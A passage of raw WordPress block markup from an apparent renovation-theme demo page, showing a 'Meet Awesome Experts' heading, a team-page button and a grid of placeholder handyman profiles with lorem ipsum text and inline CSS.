skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"91d4b807-310e-4d33-9c09-5410cb4f7c01\"} -->\n<style type=\"text/css\"> .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-91d4b807-310e-4d33-9c09-5410cb4f7c01\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"7b681c73-1c40-4bb3-af82-2e7717982562\"} -->\n<style type=\"text/css\"> .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7b681c73-1c40-4bb3-af82-2e7717982562\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"a982759b-8eb1-4278-8e6d-30ac05e73771\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"62981b50-3c5d-444e-bb72-92934717d974\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-62981b50-3c5d-444e-bb72-92934717d974 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n 